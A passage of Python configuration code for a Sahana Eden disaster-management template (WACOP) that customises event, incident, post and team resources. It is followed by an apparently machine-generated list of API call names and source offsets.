],
list_layout = cms_post_list_layout,
# Default
#orderby = "cms_post.date desc",
)
if method in ("custom", "filter"):
# Filter Widgets
from s3 import S3DateFilter, \
S3LocationFilter, \
S3OptionsFilter, \
S3TextFilter
if method == "filter":
# Apply filter_vars
get_vars = r.get_vars
for k, v in get_vars.iteritems():
# We only expect a maximum of 1 of these, no need to append
from s3 import FS
s3.filter = (FS(k) == v)
date_filter = S3DateFilter("date",
# If we introduce an end_date on Posts:
#["date", "end_date"],
label = "",
#hide_time = True,
slider = True,
clear_text = "X",
)
date_filter.input_labels = {"ge": "Start Time/Date", "le": "End Time/Date"}
from templates.WACOP.controllers import text_filter_formstyle
filter_widgets = [S3TextFilter(["body",
],
formstyle = text_filter_formstyle,
label = T("Search"),
_placeholder = T("Enter search term…"),
),
S3OptionsFilter("series_id",
label = "",
noneSelectedText = "Type", # T() added in widget
no_opts = "",
),
S3OptionsFilter("priority",
label = "",
noneSelectedText = "Priority", # T() added in widget
no_opts = "",
),
S3OptionsFilter("status_id",
label = "",
noneSelectedText = "Status", # T() added in widget
no_opts = "",
),
S3OptionsFilter("created_by$organisation_id",
label = "",
noneSelectedText = "Source", # T() added in widget
no_opts = "",
),
S3OptionsFilter("tag_post.tag_id",
label = "",
noneSelectedText = "Tag", # T() added in widget
no_opts = "",
),
date_filter,
]
if r.tablename == "event_event" or \
(method == "filter" and get_vars.get("event_post.event_id")):
# Event Profile
filter_widgets.insert(1, S3OptionsFilter("incident_post.incident_id",
label = "",
noneSelectedText = "Incident", # T() added in widget
no_opts = "",
))
user = current.auth.user
if user:
filter_widgets.insert(1, S3OptionsFilter("bookmark.user_id",
label = "",
options = {"*": T("All"),
user.id: T("My Bookmarks"),
},
cols = 2,
multiple = False,
table = False,
))
s3db.configure(tablename,
filter_widgets = filter_widgets,
)
settings.customise_cms_post_resource = customise_cms_post_resource
# -------------------------------------------------------------------------
# Event/Incident Management
#
settings.event.incident_teams_tab = "Units"
# Uncomment to preserve linked Incidents when an Event is deleted
settings.event.cascade_delete_incidents = False
# -------------------------------------------------------------------------
def customise_event_event_resource(r, tablename):
from gluon import A, URL
from s3 import s3_fieldmethod
db = current.db
s3db = current.s3db
# Virtual Fields
etable = s3db.event_event
#append = etable._virtual_methods.append
def event_name(row):
return A(row["event_event.name"],
_href = URL(c="event", f="event",
args=[row["event_event.id"], "custom"],
extension = "", # ensure no .aadata
),
)
#append(Field.Method("name_click", event_name))
etable.name_click = s3_fieldmethod("name_click",
event_name,
# over-ride the default represent of s3_unicode to prevent HTML being rendered too early
represent = lambda v: v,
)
def event_status(row):
if row["event_event.exercise"]:
status = T("Testing")
elif not row["event_event.end_date"]:
status = T("Open")
else:
status = T("Closed")
return status
#append(Field.Method("status", event_status))
etable.status = s3_fieldmethod("status", event_status)
itable = s3db.event_incident
def event_incidents(row):
query = (itable.event_id == row["event_event.id"]) & \
(itable.deleted == False)
incidents = db(query).count()
return incidents
#append(Field.Method("incidents", event_incidents))
etable.incidents = s3_fieldmethod("incidents", event_incidents)
ertable = s3db.event_team
def event_resources(row):
query = (ertable.event_id == row["event_event.id"]) & \
(ertable.deleted == False)
resources = db(query).count()
return resources
#append(Field.Method("resources", event_resources))
etable.resources = s3_fieldmethod("resources", event_resources)
ettable = s3db.event_tag
ttable = s3db.cms_tag
def event_tags(row):
query = (ettable.event_id == row["event_event.id"]) & \
(ettable.deleted == False) & \
(ettable.tag_id == ttable.id)
tags = db(query).select(ttable.name)
if tags:
tags = [t.name for t in tags]
tags = ", ".join(tags)
return tags
else:
return current.messages["NONE"]
#append(Field.Method("tags", event_tags))
etable.tags = s3_fieldmethod("tags", event_tags)
list_fields = [(T("Name"), "name_click"),
(T("Status"), "status"),
(T("Zero Hour"), "start_date"),
(T("Closed"), "end_date"),
(T("City"), "location.location_id.L3"),
(T("State"), "location.location_id.L1"),
(T("Tags"), "tags"),
(T("Incidents"), "incidents"),
(T("Resources"), "resources"),
]
s3db.configure(tablename,
extra_fields = ("name",
"end_date",
"exercise",
),
list_fields = list_fields,
orderby = "event_event.name",
)
settings.customise_event_event_resource = customise_event_event_resource
# -------------------------------------------------------------------------
def customise_event_event_controller(**attr):
s3db = current.s3db
s3 = current.response.s3
# Modify Components
s3db.add_components("event_event",
# Events have just a single Location
event_event_location = {"joinby": "event_id",
"multiple": False,
},
# Incidents are linked to Events, not created from them
# - not a link table though, so can't change the actuation
#event_incident = {"joinby": "event_id",
# },
)
# Custom Browse
from templates.WACOP.controllers import event_Browse, event_Profile
set_method = s3db.set_method
set_method("event", "event",
method = "browse",
action = event_Browse)
# Custom Profile
set_method("event", "event",
method = "custom",
action = event_Profile)
# Custom prep
standard_prep = s3.prep
def custom_prep(r):
# Call standard postp
if callable(standard_prep):
result = standard_prep(r)
cname = r.component_name
if not cname:
f = s3db.event_event.event_type_id
f.readable = f.writable = False
elif cname == "task":
from gluon import IS_EMPTY_OR
from s3 import IS_ONE_OF, S3SQLCustomForm, S3SQLInlineComponent
itable = s3db.event_incident
query = (itable.event_id == r.id) & \
(itable.closed == False) & \
(itable.deleted == False)
set = current.db(query)
f = s3db.event_task.incident_id
f.requires = IS_EMPTY_OR(
IS_ONE_OF(set, "event_incident.id",
f.represent,
orderby="event_incident.name",
sort=True))
crud_form = S3SQLCustomForm(
S3SQLInlineComponent("incident",
fields = [("", "incident_id")],
label = T("Incident"),
multiple = False,
filterby = dict(field = "event_id",
options = r.id,
)
),
"name",
"description",
"source",
"priority",
"pe_id",
"date_due",
"status",
"comments",
)
r.component.configure(crud_form = crud_form,
)
elif r.representation == "popup" and r.get_vars.get("view"):
# Popups for lists in Parent Event of Incident Screen or Event Profile header
# No Title since this is on the Popup
s3.crud_strings["event_event"].title_display = ""
# No create button & Tweak list_fields
if cname == "incident":
list_fields = ["date",
"name",
"incident_type_id",
]
elif cname == "group":
list_fields = ["incident_id",
"group_id",
"status_id",
]
elif cname == "post":
list_fields = ["date",
"series_id",
"priority",
"status_id",
"body",
]
else:
# Shouldn't get here but want to avoid crashes
list_fields = []
r.component.configure(insertable = False,
list_fields = list_fields,
)
return True
s3.prep = custom_prep
# Custom rheader tabs
attr = dict(attr)
attr["rheader"] = wacop_event_rheader
return attr
settings.customise_event_event_controller = customise_event_event_controller
# -------------------------------------------------------------------------
def customise_event_incident_resource(r, tablename):
from gluon import A, URL
from s3 import s3_fieldmethod
s3db = current.s3db
# Virtual Fields
itable = s3db.event_incident
#append = itable._virtual_methods.append
def incident_name(row):
return A(row["event_incident.name"],
_href = URL(c="event", f="incident",
args=[row["event_incident.id"], "custom"],
extension = "", # ensure no .aadata
),
)
#append(Field.Method("name_click", incident_name))
itable.name_click = s3_fieldmethod("name_click",
incident_name,
# over-ride the default represent of s3_unicode to prevent HTML being rendered too early
represent = lambda v: v,
)
def incident_status(row):
if row["event_incident.exercise"]:
status = T("Testing")
elif not row["event_incident.end_date"]:
status = T("Open")
else:
status = T("Closed")
return status
#append(Field.Method("status", incident_status))
itable.status = s3_fieldmethod("status", incident_status)
if r.method == "browse" or r.get_vars.get("browse"):
# Incident Browse
db = current.db
ertable = s3db.event_team
def incident_resources(row):
query = (ertable.event_id == row["event_incident.id"]) & \
(ertable.deleted == False)
resources = db(query).count()
return resources
#append(Field.Method("resources", incident_resources))
itable.resources = s3_fieldmethod("resources", incident_resources)
ettable = s3db.event_tag
ttable = s3db.cms_tag
def incident_tags(row):
query = (ettable.incident_id == row["event_incident.id"]) & \
(ettable.deleted == False) & \
(ettable.tag_id == ttable.id)
tags = db(query).select(ttable.name)
if tags:
tags = [t.name for t in tags]
tags = ", ".join(tags)
return tags
else:
return current.messages["NONE"]
#append(Field.Method("tags", incident_tags))
itable.tags = s3_fieldmethod("tags", incident_tags)
list_fields = [(T("Name"), "name_click"),
(T("Status"), "status"),
(T("Type"), "incident_type_id"),
(T("Zero Hour"), "date"),
(T("Closed"), "end_date"),
(T("City"), "location.location_id.L3"),
(T("State"), "location.location_id.L1"),
(T("Tags"), "tags"),
(T("Resources"), "resources"),
(T("Event"), "event_id"),
]
else:
# Homepage or Event Profile
list_fields = [(T("Name"), "name_click"),
(T("Status"), "status"),
(T("Type"), "incident_type_id"),
"location_id",
(T("Start"), "date"),
]
s3db.configure(tablename,
extra_fields = ("name",
"end_date",
"exercise",
),
list_fields = list_fields,
orderby = "event_incident.name",
)
settings.customise_event_incident_resource = customise_event_incident_resource
# -------------------------------------------------------------------------
def customise_event_incident_controller(**attr):
s3db = current.s3db
response = current.response
s3 = response.s3
# Load normal model to be able to override configuration
table = s3db.event_incident
table.event_id.readable = table.event_id.writable = True
# Custom Browse
from templates.WACOP.controllers import incident_Browse, incident_Profile
set_method = s3db.set_method
set_method("event", "incident",
method = "browse",
action = incident_Browse)
# Custom Profile
set_method("event", "incident",
method = "custom",
action = incident_Profile)
#s3.crud_strings["event_incident"].title_list = T("Browse Incidents")
# Custom prep
standard_prep = s3.prep
def custom_prep(r):
# Call standard postp
if callable(standard_prep):
result = standard_prep(r)
if r.method == "assign":
current.menu.main = ""
elif r.component_name == "task":
from s3 import S3SQLCustomForm
crud_form = S3SQLCustomForm("name",
"description",
"source",
"priority",
"pe_id",
"date_due",
"status",
"comments",
)
r.component.configure(crud_form = crud_form,
)
elif r.representation == "popup":
if not r.component:
if r.get_vars.get("set_event"):
# Popup just used to link to Event
#s3.crud_strings["event_incident"].title_update = T("Add to Event")
from s3 import S3SQLCustomForm
crud_form = S3SQLCustomForm("event_id",
)
s3db.configure("event_incident",
crud_form = crud_form,
)
#elif r.component_name == "post":
# from s3 import S3SQLCustomForm
# crud_form = S3SQLCustomForm("body",
# )
# s3db.configure("cms_post",
# crud_form = crud_form,
# )
return True
s3.prep = custom_prep
# Custom postp
standard_postp = s3.postp
def custom_postp(r, output):
# Call standard postp
if callable(standard_postp):
output = standard_postp(r, output)
if r.interactive and isinstance(output, dict):
if r.method == "assign":
# No Top Menu
current.menu.main = ""
# Custom View to waste less space inside popup
import os
response.view = os.path.join(r.folder,
"modules", "templates",
"WACOP", "views",
"assign.html")
#elif r.component_name == "post":
# # Add Tags - no, do client-side
# output["form"].append()
#else:
# # Summary or Profile pages
# # Additional styles
# s3.external_stylesheets += ["https://cdn.knightlab.com/libs/timeline3/latest/css/timeline.css",
# "https://fonts.googleapis.com/css?family=Merriweather:400,700|Source+Sans+Pro:400,700",
# ]
#if r.method == "summary":
# # Open the Custom profile page instead of the normal one
# from gluon import URL
# from s3 import S3CRUD
# custom_url = URL(args = ["[id]", "custom"])
# S3CRUD.action_buttons(r,
# read_url=custom_url,
# update_url=custom_url)
# # System-wide Alert
# from templates.WACOP.controllers import custom_WACOP
# custom = custom_WACOP()
# output["system_wide"] = custom._system_wide_html()
return output
s3.postp = custom_postp
# Custom rheader tabs
#attr = dict(attr)
#attr["rheader"] = wacop_event_rheader
attr["rheader"] = None
# No sidebar menu
current.menu.options = None
return attr
settings.customise_event_incident_controller = customise_event_incident_controller
# -------------------------------------------------------------------------
def customise_event_human_resource_resource(r, tablename):
from gluon import A, URL
from s3 import s3_fieldmethod
s3db = current.s3db
# Virtual Fields
# Always used from either the Event or Incident context
f = r.function
record_id = r.id
ehrtable = s3db.event_human_resource
hr_represent = ehrtable.human_resource_id.represent
def hr_name(row):
hr_id = row["event_human_resource.human_resource_id"]
return A(hr_represent(hr_id),
_href = URL(c="event", f=f,
args=[record_id, "human_resource", hr_id, "profile"],
),
)
ehrtable.name_click = s3_fieldmethod("name_click",
hr_name,
# over-ride the default represent of s3_unicode to prevent HTML being rendered too early
# @ToDo: Bulk lookups
represent = lambda v: v,
)
s3db.configure(tablename,
#crud_form = crud_form,
extra_fields = ("human_resource_id",
),
list_fields = [(T("Name"), "name_click"),
(T("Title"), "human_resource_id$job_title_id"),
"human_resource_id$organisation_id",
(T("Email"), "human_resource_id$person_id$email.value"),
(T("Phone"), "human_resource_id$person_id$phone.value"),
"status",
(T("Notes"), "comments"),
],
orderby = "event_human_resource.human_resource_id",
)
settings.customise_event_human_resource_resource = customise_event_human_resource_resource
# -------------------------------------------------------------------------
def customise_event_organisation_resource(r, tablename):
from gluon import A, URL
from s3 import s3_fieldmethod
s3db = current.s3db
# Virtual Fields
# Always used from either the Event or Incident context
f = r.function
record_id = r.id
eotable = s3db.event_organisation
org_represent = eotable.organisation_id.represent
def org_name(row):
organisation_id = row["event_organisation.organisation_id"]
return A(org_represent(organisation_id),
_href = URL(c="event", f=f,
args=[record_id, "organisation", organisation_id, "profile"],
),
)
eotable.name_click = s3_fieldmethod("name_click",
org_name,
# over-ride the default represent of s3_unicode to prevent HTML being rendered too early
# @ToDo: Bulk lookups
represent = lambda v: v,
)
s3db.configure(tablename,
#crud_form = crud_form,
extra_fields = ("organisation_id",
),
list_fields = [(T("Name"), "name_click"),
"status",
"comments",
],
orderby = "event_organisation.organisation_id",
)
settings.customise_event_organisation_resource = customise_event_organisation_resource
# -------------------------------------------------------------------------
def customise_event_team_resource(r, tablename):
from gluon import A, URL
from s3 import s3_fieldmethod, S3SQLCustomForm
s3db = current.s3db
ertable = s3db.event_team
#sertable.group_id.label = T("Resource")
# Form
# @ToDo: Have both Team & Event_Team in 1 form
crud_form = S3SQLCustomForm("incident_id",
"group_id",
"status_id",
)
# Virtual Fields
# Always used from either the Event or Incident context
f = r.function
record_id = r.id
group_represent = ertable.group_id.represent
def team_name(row):
group_id = row["event_team.group_id"]
return A(group_represent(group_id),
_href = URL(c="event", f=f,
args=[record_id, "group", group_id, "profile"],
extension = "", # ensure no .aadata
),
)
ertable.name_click = s3_fieldmethod("name_click",
team_name,
# over-ride the default represent of s3_unicode to prevent HTML being rendered too early
# @ToDo: Bulk lookups
represent = lambda v: v,
)
s3db.configure(tablename,
crud_form = crud_form,
extra_fields = ("group_id",
),
list_fields = [(T("Name"), "name_click"),
"status_id",
],
orderby = "pr_group.name",
)
settings.customise_event_team_resource = customise_event_team_resource
# -------------------------------------------------------------------------
def customise_pr_group_resource(r, tablename):
s3db = current.s3db
current.response.s3.crud_strings[tablename] = Storage(
label_create = T("Create Resource"),
title_display = T("Resource Details"),
title_list = T("Resources"),
title_update = T("Edit Resource"),
label_list_button = T("List Resources"),
label_delete_button = T("Delete Resource"),
msg_record_created = T("Resource added"),
msg_record_modified = T("Resource updated"),
msg_record_deleted = T("Resource deleted"),
msg_list_empty = T("No Resources currently registered"))
field = s3db.pr_group.status_id
field.readable = field.writable = True
from s3 import S3SQLCustomForm
crud_form = S3SQLCustomForm((T("Name"), "name"),
"status_id",
"comments",
)
list_fields = [(T("Name"), "name"),
"status_id",
"comments",
]
s3db.configure(tablename,
crud_form = crud_form,
list_fields = list_fields,
)
settings.customise_pr_group_resource = customise_pr_group_resource
# -------------------------------------------------------------------------
def customise_pr_person_controller(**attr):
# Custom Profile
from templates.WACOP.controllers import person_Dashboard
current.s3db.set_method("pr", "person",
method = "dashboard",
action = person_Dashboard)
# No sidebar menu
current.menu.options = None
return attr
settings.customise_pr_person_controller = customise_pr_person_controller
# -------------------------------------------------------------------------
def customise_project_task_resource(r, tablename):
from gluon import A, URL
from s3 import s3_fieldmethod
s3db = current.s3db
# Virtual Fields
# Always used from either the Event or Incident context
f = r.function
record_id = r.id
def task_name(row):
return A(row["project_task.name"],
_href = URL(c="event", f=f,
args=[record_id, "task", row["project_task.id"], "profile"],
),
)
s3db.project_task.name_click = s3_fieldmethod("name_click",
task_name,
# over-ride the default represent of s3_unicode to prevent HTML being rendered too early
represent = lambda v: v,
)
s3db.configure(tablename,
#crud_form = crud_form,
extra_fields = ("name",
),
list_fields = ["status",
(T("Description"), "name_click"),
(T("Created"), "created_on"),
(T("Due"), "date_due"),
],
orderby = "project_task.date_due",
)
settings.customise_project_task_resource = customise_project_task_resource
# =============================================================================
def wacop_event_rheader(r, tabs=[]):
""" EVENT custom resource headers """
if r.representation != "html":
# Resource headers only used in interactive views
return None
from s3 import s3_rheader_resource, S3ResourceHeader
tablename, record = s3_rheader_resource(r)
if tablename != r.tablename:
resource = current.s3db.resource(tablename, id=record.id)
else:
resource = r.resource
rheader = None
rheader_fields = []
if record:
T = current.T
if tablename == "event_event":
if not tabs:
tabs = [(T("Event Details"), None),
(T("Incidents"), "incident"),
(T("Units"), "group"),
(T("Tasks"), "task"),
(T("Updates"), "post"),
]
rheader_fields = [["name"],
["start_date"],
["comments"],
]
elif tablename == "event_incident":
if not tabs:
tabs = [(T("Incident Details"), None),
(T("Units"), "group"),
(T("Tasks"), "task"),
(T("Updates"), "post"),
]
rheader_fields = [["name"],
["date"],
["comments"],
]
rheader = S3ResourceHeader(rheader_fields, tabs)(r,
table=resource.table,
record=record,
)
return rheader
# END =========================================================================
| [
"s3.s3_fieldmethod",
"gluon.current.db",
"collections.OrderedDict",
"s3.IS_ONE_OF",
"s3.S3ResourceHeader",
"gluon.current.s3db.set_method",
"gluon.current.request.post_vars.get",
"s3.S3DateFilter",
"gluon.URL",
"s3.S3OptionsFilter",
"os.path.join",
"s3.s3_rheader_resource",
"s3.FS",
"gluon... | [((1991, 2042), 'collections.OrderedDict', 'OrderedDict', (["[('en', 'English'), ('es', 'Español')]"], {}), "([('en', 'English'), ('es', 'Español')])\n", (2002, 2042), False, 'from collections import OrderedDict\n'), ((49140, 49162), 's3.s3_rheader_resource', 's3_rheader_resource', (['r'], {}), '(r)\n', (49159, 49162), False, 'from s3 import s3_rheader_resource, S3ResourceHeader\n'), ((9240, 9277), 'gluon.current.request.post_vars.get', 'current.request.post_vars.get', (['"""tags"""'], {}), "('tags')\n", (9269, 9277), False, 'from gluon import current\n'), ((21582, 21645), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'event_name'], {'represent': '(lambda v: v)'}), "('name_click', event_name, represent=lambda v: v)\n", (21596, 21645), False, 'from s3 import s3_fieldmethod\n'), ((22269, 22307), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""status"""', 'event_status'], {}), "('status', event_status)\n", (22283, 22307), False, 'from s3 import s3_fieldmethod\n'), ((22651, 22695), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""incidents"""', 'event_incidents'], {}), "('incidents', event_incidents)\n", (22665, 22695), False, 'from s3 import s3_fieldmethod\n'), ((23038, 23082), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""resources"""', 'event_resources'], {}), "('resources', event_resources)\n", (23052, 23082), False, 'from s3 import s3_fieldmethod\n'), ((23666, 23700), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""tags"""', 'event_tags'], {}), "('tags', event_tags)\n", (23680, 23700), False, 'from s3 import s3_fieldmethod\n'), ((30347, 30413), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'incident_name'], {'represent': '(lambda v: v)'}), "('name_click', incident_name, represent=lambda v: v)\n", (30361, 30413), False, 'from s3 import s3_fieldmethod\n'), ((31049, 31090), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""status"""', 'incident_status'], {}), "('status', incident_status)\n", (31063, 31090), False, 'from s3 import s3_fieldmethod\n'), ((39842, 39902), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'hr_name'], {'represent': '(lambda v: v)'}), "('name_click', hr_name, represent=lambda v: v)\n", (39856, 39902), False, 'from s3 import s3_fieldmethod\n'), ((42057, 42118), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'org_name'], {'represent': '(lambda v: v)'}), "('name_click', org_name, represent=lambda v: v)\n", (42071, 42118), False, 'from s3 import s3_fieldmethod\n'), ((43455, 43510), 's3.S3SQLCustomForm', 'S3SQLCustomForm', (['"""incident_id"""', '"""group_id"""', '"""status_id"""'], {}), "('incident_id', 'group_id', 'status_id')\n", (43470, 43510), False, 'from s3 import S3SQLCustomForm\n'), ((44225, 44287), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'team_name'], {'represent': '(lambda v: v)'}), "('name_click', team_name, represent=lambda v: v)\n", (44239, 44287), False, 'from s3 import s3_fieldmethod\n'), ((46780, 46869), 'gluon.current.s3db.set_method', 'current.s3db.set_method', (['"""pr"""', '"""person"""'], {'method': '"""dashboard"""', 'action': 'person_Dashboard'}), "('pr', 'person', method='dashboard', action=\n person_Dashboard)\n", (46803, 46869), False, 'from gluon import current\n'), ((47786, 47848), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""name_click"""', 'task_name'], {'represent': '(lambda v: v)'}), "('name_click', task_name, represent=lambda v: v)\n", (47800, 47848), False, 'from s3 import s3_fieldmethod\n'), ((49215, 49261), 'gluon.current.s3db.resource', 'current.s3db.resource', (['tablename'], {'id': 'record.id'}), '(tablename, id=record.id)\n', (49236, 49261), False, 'from gluon import current\n'), ((12482, 12511), 's3.S3SQLCustomForm', 'S3SQLCustomForm', (['*crud_fields'], {}), '(*crud_fields)\n', (12497, 12511), False, 'from s3 import S3SQLCustomForm\n'), ((31593, 31640), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""resources"""', 'incident_resources'], {}), "('resources', incident_resources)\n", (31607, 31640), False, 'from s3 import s3_fieldmethod\n'), ((32296, 32333), 's3.s3_fieldmethod', 's3_fieldmethod', (['"""tags"""', 'incident_tags'], {}), "('tags', incident_tags)\n", (32310, 32333), False, 'from s3 import s3_fieldmethod\n'), ((50355, 50393), 's3.S3ResourceHeader', 'S3ResourceHeader', (['rheader_fields', 'tabs'], {}), '(rheader_fields, tabs)\n', (50371, 50393), False, 'from s3 import s3_rheader_resource, S3ResourceHeader\n'), ((4645, 4719), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Home"""', 'restricted': '(False)', 'access': 'None', 'module_type': 'None'}), "(name_nice='Home', restricted=False, access=None, module_type=None)\n", (4652, 4719), False, 'from gluon.storage import Storage\n'), ((4985, 5073), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Administration"""', 'restricted': '(True)', 'access': '"""|1|"""', 'module_type': 'None'}), "(name_nice='Administration', restricted=True, access='|1|',\n module_type=None)\n", (4992, 5073), False, 'from gluon.storage import Storage\n'), ((5347, 5417), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Administration"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Administration', restricted=True, module_type=None)\n", (5354, 5417), False, 'from gluon.storage import Storage\n'), ((5763, 5852), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Synchronization"""', 'restricted': '(True)', 'access': '"""|1|"""', 'module_type': 'None'}), "(name_nice='Synchronization', restricted=True, access='|1|',\n module_type=None)\n", (5770, 5852), False, 'from gluon.storage import Storage\n'), ((6324, 6380), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Map"""', 'restricted': '(True)', 'module_type': '(1)'}), "(name_nice='Map', restricted=True, module_type=1)\n", (6331, 6380), False, 'from gluon.storage import Storage\n'), ((6550, 6694), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Persons"""', 'description': '"""Central point to record details on People"""', 'restricted': '(True)', 'access': '"""|1|"""', 'module_type': 'None'}), "(name_nice='Persons', description=\n 'Central point to record details on People', restricted=True, access=\n '|1|', module_type=None)\n", (6557, 6694), False, 'from gluon.storage import Storage\n'), ((6897, 6964), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Organizations"""', 'restricted': '(True)', 'module_type': '(10)'}), "(name_nice='Organizations', restricted=True, module_type=10)\n", (6904, 6964), False, 'from gluon.storage import Storage\n'), ((7224, 7288), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Contacts"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Contacts', restricted=True, module_type=None)\n", (7231, 7288), False, 'from gluon.storage import Storage\n'), ((7417, 7489), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Content Management"""', 'restricted': '(True)', 'module_type': '(10)'}), "(name_nice='Content Management', restricted=True, module_type=10)\n", (7424, 7489), False, 'from gluon.storage import Storage\n'), ((7579, 7638), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Events"""', 'restricted': '(True)', 'module_type': '(2)'}), "(name_nice='Events', restricted=True, module_type=2)\n", (7586, 7638), False, 'from gluon.storage import Storage\n'), ((7727, 7787), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Fire"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Fire', restricted=True, module_type=None)\n", (7734, 7787), False, 'from gluon.storage import Storage\n'), ((7878, 7940), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Police"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Police', restricted=True, module_type=None)\n", (7885, 7940), False, 'from gluon.storage import Storage\n'), ((8032, 8093), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Tasks"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Tasks', restricted=True, module_type=None)\n", (8039, 8093), False, 'from gluon.storage import Storage\n'), ((8181, 8246), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Documents"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Documents', restricted=True, module_type=None)\n", (8188, 8246), False, 'from gluon.storage import Storage\n'), ((8420, 8486), 'gluon.storage.Storage', 'Storage', ([], {'name_nice': '"""Statistics"""', 'restricted': '(True)', 'module_type': 'None'}), "(name_nice='Statistics', restricted=True, module_type=None)\n", (8427, 8486), False, 'from gluon.storage import Storage\n'), ((16103, 16162), 's3.S3DateFilter', 'S3DateFilter', (['"""date"""'], {'label': '""""""', 'slider': '(True)', 'clear_text': '"""X"""'}), "('date', label='', slider=True, clear_text='X')\n", (16115, 16162), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((21271, 21350), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': '"""event"""', 'args': "[row['event_event.id'], 'custom']", 'extension': '""""""'}), "(c='event', f='event', args=[row['event_event.id'], 'custom'], extension='')\n", (21274, 21350), False, 'from gluon import A, URL\n'), ((26637, 26654), 'gluon.current.db', 'current.db', (['query'], {}), '(query)\n', (26647, 26654), False, 'from gluon import current\n'), ((30027, 30116), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': '"""incident"""', 'args': "[row['event_incident.id'], 'custom']", 'extension': '""""""'}), "(c='event', f='incident', args=[row['event_incident.id'], 'custom'],\n extension='')\n", (30030, 30116), False, 'from gluon import A, URL\n'), ((34998, 35105), 's3.S3SQLCustomForm', 'S3SQLCustomForm', (['"""name"""', '"""description"""', '"""source"""', '"""priority"""', '"""pe_id"""', '"""date_due"""', '"""status"""', '"""comments"""'], {}), "('name', 'description', 'source', 'priority', 'pe_id',\n 'date_due', 'status', 'comments')\n", (35013, 35105), False, 'from s3 import S3SQLCustomForm\n'), ((37121, 37200), 'os.path.join', 'os.path.join', (['r.folder', '"""modules"""', '"""templates"""', '"""WACOP"""', '"""views"""', '"""assign.html"""'], {}), "(r.folder, 'modules', 'templates', 'WACOP', 'views', 'assign.html')\n", (37133, 37200), False, 'import os\n'), ((39646, 39719), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': 'f', 'args': "[record_id, 'human_resource', hr_id, 'profile']"}), "(c='event', f=f, args=[record_id, 'human_resource', hr_id, 'profile'])\n", (39649, 39719), False, 'from gluon import A, URL\n'), ((41854, 41939), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': 'f', 'args': "[record_id, 'organisation', organisation_id, 'profile']"}), "(c='event', f=f, args=[record_id, 'organisation', organisation_id,\n 'profile'])\n", (41857, 41939), False, 'from gluon import A, URL\n'), ((43967, 44052), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': 'f', 'args': "[record_id, 'group', group_id, 'profile']", 'extension': '""""""'}), "(c='event', f=f, args=[record_id, 'group', group_id, 'profile'],\n extension='')\n", (43970, 44052), False, 'from gluon import A, URL\n'), ((47574, 47659), 'gluon.URL', 'URL', ([], {'c': '"""event"""', 'f': 'f', 'args': "[record_id, 'task', row['project_task.id'], 'profile']"}), "(c='event', f=f, args=[record_id, 'task', row['project_task.id'], 'profile']\n )\n", (47577, 47659), False, 'from gluon import A, URL\n'), ((11839, 11934), 's3.IS_ONE_OF', 'IS_ONE_OF', (['set', '"""event_incident.id"""', 'f.represent'], {'orderby': '"""event_incident.name"""', 'sort': '(True)'}), "(set, 'event_incident.id', f.represent, orderby=\n 'event_incident.name', sort=True)\n", (11848, 11934), False, 'from s3 import IS_ONE_OF, S3SQLCustomForm, S3SQLInlineComponent\n'), ((17154, 17229), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""series_id"""'], {'label': '""""""', 'noneSelectedText': '"""Type"""', 'no_opts': '""""""'}), "('series_id', label='', noneSelectedText='Type', no_opts='')\n", (17169, 17229), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((17495, 17573), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""priority"""'], {'label': '""""""', 'noneSelectedText': '"""Priority"""', 'no_opts': '""""""'}), "('priority', label='', noneSelectedText='Priority', no_opts='')\n", (17510, 17573), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((17839, 17916), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""status_id"""'], {'label': '""""""', 'noneSelectedText': '"""Status"""', 'no_opts': '""""""'}), "('status_id', label='', noneSelectedText='Status', no_opts='')\n", (17854, 17916), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((18182, 18281), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""created_by$organisation_id"""'], {'label': '""""""', 'noneSelectedText': '"""Source"""', 'no_opts': '""""""'}), "('created_by$organisation_id', label='', noneSelectedText=\n 'Source', no_opts='')\n", 